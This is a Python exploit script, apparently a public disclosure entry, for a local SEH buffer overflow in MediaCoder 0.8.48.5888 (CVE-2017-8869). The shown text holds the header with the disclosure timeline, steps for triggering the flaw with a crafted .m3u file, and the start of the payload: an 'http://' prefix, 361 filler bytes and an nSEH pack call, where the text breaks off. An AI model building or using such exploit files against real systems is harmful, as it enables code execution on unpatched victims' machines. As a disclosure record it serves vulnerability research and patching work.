#!/usr/bin/python # Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH) # CVE : CVE-2017-8869 # Exploit Author : Muhann4d @0xSecured # Vendor Homepage : http://www.mediacoderhq.com # Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe # Vulnerable Version : 0.8.48.5888 # Fixed version : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe # Category : Local Buffer Overflow # Tested on OS : Windows 7 Pro SP1 32bit # How to : Open MediaCoder then drag & drop the .m3u file in it and then press the START button. # or just write click on the .mu3 file .. open with .. MediaCoder # Timeline : # 2017-05-05: Vulnerability discovered, vendor has been contaced # 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" # 2017-05-09: A POC sent to the vendor. # 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/ # 2017-06-26: Exploit released. print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured" from struct import pack junk = "http://" + "\x41" * 361 nseh = pack('